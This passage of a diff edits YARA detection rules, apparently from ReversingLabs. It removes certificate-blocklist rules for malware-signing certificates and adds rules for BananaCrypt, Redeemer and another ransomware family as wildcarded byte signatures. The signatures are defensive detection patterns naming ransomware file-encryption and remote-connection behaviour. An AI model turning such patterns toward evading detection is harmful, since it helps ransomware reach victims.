+            30 64 89 20 8B C3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 BE ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ??
+            ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 6A ?? 56 6A ?? 6A ?? 6A ?? 8B 45 ?? E8
+        }
+		$remote_connection_p2 = {
+            50 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84
+            ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C9 B2 ?? A1 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? B8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 8B 45 ?? 8B 70 ?? 85 F6 74 ?? 83 EE ?? 8B 36 68 ?? ?? ?? ?? 56 8B 45
+            ?? 8B 40 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 EB ?? 83 7D ?? ?? 74 ?? 8D 95 ??
+            ?? ?? ?? 8B 4D ?? 8B 45 ?? 8B 30 FF 56 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
+            B9 ?? ?? ?? ?? 8B 45 ?? 8B 30 FF 56 ?? 8B C3 8B 55 ?? 8B 52 ?? E8 ?? ?? ?? ?? 33 C0
+            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 E9
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOMATIC d.o.o." and ( pe.signatures [ i ] . serial == "00:5c:f3:77:8b:b1:11:15:a8:84:e1:92:a7:cb:80:75:99" or pe.signatures [ i ] . serial == "5c:f3:77:8b:b1:11:15:a8:84:e1:92:a7:cb:80:75:99" ) and 1605006199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_82Cb93593B658100Cdd7A00C874287F2 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Bananacrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BananaCrypt ransomware."
 		author = "ReversingLabs"
-		id = "85df653a-a4a3-5d0e-86f4-cad0249cd3d3"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "9e47d094-d7fc-57dd-826c-5321d0219273"
+		date = "2020-09-14"
+		modified = "2020-09-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6558-L6576"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c77881e0365c9fc398097d0b6e077330a5f0fcbb53279bfde96b3c01df914c55"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.BananaCrypt.yara#L1-L103"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6bde4430e438947b0d7f10c4de11216929ec03af81b3d74f8b7bb8ed134d08d2"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BananaCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sportsonline24 B.V." and ( pe.signatures [ i ] . serial == "00:82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2" or pe.signatures [ i ] . serial == "82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2" ) and 1605117874 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_9A8Bcfd05F86B15D0C99F50Cf414Bd00 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "4446aead-9505-545a-8d3a-6ad844d348d3"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6578-L6596"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "803d70dddeff51b753b577ea196b12570847c6875ae676a2d12cf1ca9323be34"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            55 89 E5 57 56 53 89 C3 81 EC ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 55 ?? 89 8D ?? ?? ??
+            ?? 85 D2 74 ?? 8B 45 ?? 85 C0 0F 85 ?? ?? ?? ?? 31 F6 0F B6 13 84 D2 0F 84 ?? ?? ??
+            ?? 8D 43 ?? 88 95 ?? ?? ?? ?? 8D 8B ?? ?? ?? ?? 8D BD ?? ?? ?? ?? EB ?? 83 C0 ?? 83
+            C7 ?? 88 57 ?? 39 C1 74 ?? 0F B6 10 84 D2 75 ?? 89 BD ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            C6 00 ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 89 F0 84
+            C0 0F 85 ?? ?? ?? ?? 8D 5D ?? 8D 76 ?? 8D BC 27 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04
+            24 E8 ?? ?? ?? ?? 85 C0 89 C6 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D BD ?? ?? ?? ??
+            39 F9 89 C8 76 ?? 0F B6 41 ?? 89 CF 3C ?? 0F 95 C1 3C ?? 0F 95 C2 84 D1 0F 84 ?? ??
+            ?? ?? 3C ?? 0F 84 ?? ?? ?? ?? 8D 47 ?? C6 07 ?? 8D 7E ?? 39 D8 89 BD ?? ?? ?? ?? 73
+            ?? 0F B6 56 ?? 84 D2 74 ?? 89 F9 8B BD ?? ?? ?? ?? EB ?? 90 0F B6 11 84 D2 74 ?? 83
+            C0 ?? 83 C1 ?? 88 50 ?? 39 D8 75 ?? 89 BD ?? ?? ?? ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 31
+            FF 89 04 24 E8 ?? ?? ?? ?? 85 C0 89 C2 74 ?? 80 38 ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 90
+            83 C7 ?? 80 3C 3A ?? 75 ?? 89 85 ?? ?? ?? ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 89 95
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 46 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 8B 95
+            ?? ?? ?? ?? 74 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 7C 24 ?? 89 14 24 89
+        }
+		$encrypt_files_p2 = {
+            44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C6 8D 85 ?? ?? ?? ?? 89 F1 89 04 24 E8 ?? ?? ?? ??
+            83 EC ?? 89 F1 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 89 C7 8D
+            40 ?? 83 F8 ?? 76 ?? 89 F1 83 05 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 3C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 F1 E8 ??
+            ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8
+            ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 89
+            F1 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
+            B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A6 0F 84 ?? ?? ?? ?? 8B B5 ?? ?? ??
+            ?? BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A6 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 8D ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 8D 74 26 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24
+            E8 ?? ?? ?? ?? 8D 65 ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C3 8B 45 ?? 89 1C 24 89 44 24 ??
+            8B 45 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 C6 E9 ?? ?? ?? ?? 8D 65 ?? 31 C0 5B 5E 5F 5D
+            C3 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E9
+        }
+		$find_files_p1 = {
+            8D 4C 24 ?? 83 E4 ?? FF 71 ?? 55 89 E5 57 56 53 51 81 EC ?? ?? ?? ?? 8B 31 8B 79 ??
+            E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 7E ?? 89 74 24 ?? C7 04
+            24 ?? ?? ?? ?? 31 DB E8 ?? ?? ?? ?? 8B 04 9F 89 5C 24 ?? 83 C3 ?? C7 04 24 ?? ?? ??
+            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 39 DE 75 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 47 ?? 89 04 24
+            E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89
+            44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D BD ??
+            ?? ?? ?? F3 A5 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 04 24 C7 85
+        }
+		$find_files_p2 = {
+            8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C3 E8 ?? ?? ?? ??
+            8D 44 03 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 1C 24 89 44 24 ?? E8
+            ?? ?? ?? ?? 89 DA 8B 0A 83 C2 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ?? 74 ??
+            A9 ?? ?? ?? ?? 74 ?? 89 C1 00 C1 83 DA ?? C7 02 ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7
+            42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 84 C0 74 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 65 ?? 31 C0 59 5B 5E
+            5F 5D 8D 61 ?? C3 C1 E8 ?? 83 C2 ?? EB ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? 89 04 24 B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29
+            F9 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 29 CE 81 C1 ?? ?? ?? ?? C1 E9 ?? 89 45 ?? F3
+        }
+		$find_files_p3 = {
+            A5 89 1C 24 E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 89 C6 74 ?? 89 44 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 34 24 E8 ??
+            ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 89 C6 0F 84 ?? ?? ?? ?? 89 44 24
+            ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ??
+            ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? E9
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AI Software a.s." and ( pe.signatures [ i ] . serial == "00:9a:8b:cf:d0:5f:86:b1:5d:0c:99:f5:0c:f4:14:bd:00" or pe.signatures [ i ] . serial == "9a:8b:cf:d0:5f:86:b1:5d:0c:99:f5:0c:f4:14:bd:00" ) and 1592442000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_95E5793F2Abe0B4Ec9Be54Fd24F76Ae5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Redeemer : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Redeemer ransomware."
 		author = "ReversingLabs"
-		id = "6b992971-6a1f-53e3-8651-f25a6b761c41"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "080ab595-862b-5dc2-aaff-a0efd819a9fa"
+		date = "2022-01-17"
+		modified = "2022-01-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6598-L6616"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bd198665ae952e11c91adc329908e3cd55a55365875200cd81d2f71fd092f1fe"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Redeemer.yara#L1-L105"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "28287f6620a2f7a90057d1f97947e065721119e26398fe659331dc5fe99761de"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Redeemer"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ??
+            8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 89 B5 ?? ??
+            ?? ?? 89 B5 ?? ?? ?? ?? 3B F7 0F 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 8B 3D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ??
+            C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ??
+            ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B
+            CC 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0
+        }
+		$encrypt_files_p1 = {
+            80 FB ?? 0F 85 ?? ?? ?? ?? 83 EC ?? 8D 55 ?? 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ??
+            C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 33 D2
+            6A ?? 66 89 10 8D 45 ?? 52 50 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83
+            79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 33 D2 6A ?? 66 89 10 8D 45 ??
+            52 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 8D 45 ?? 3B C6
+            74 ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33 C0 C7 45 ??
+            ?? ?? ?? ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C6 45
+        }
+		$encrypt_files_p2 = {
+            8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 35 ?? ?? ?? ?? 33 C0 83 7D ?? ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ??
+            50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D6 85 C0 0F 85 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 50 FF D6 8B 85 ?? ?? ??
+            ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 45 ?? 83 C4 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33
+            C0 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
+            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 E8
+        }
+		$modify_processes_p1 = {
+            8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50
+        }
+		$modify_processes_p2 = {
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 6A ?? 8D 8D ?? ?? ?? ?? 6A ?? 8D 04 52 8D 04 C1
+            50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F
+            43 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D B5
+            ?? ?? ?? ?? 0F 43 95 ?? ?? ?? ?? 0F 43 B5 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C8 ??
+            50 56 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 6A ?? 8D 8D ?? ?? ??
+            ?? 6A ?? 8D 04 52 8D 04 C1 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ??
+            ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC FF 37 E8
+            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? C6 45 ?? ?? 8D 85 ?? ??
+            ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89
+            0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 FF 77
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kommservice LLC" and ( pe.signatures [ i ] . serial == "00:95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5" or pe.signatures [ i ] . serial == "95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5" ) and 1604933746 <= pe.signatures [ i ] . not_after )
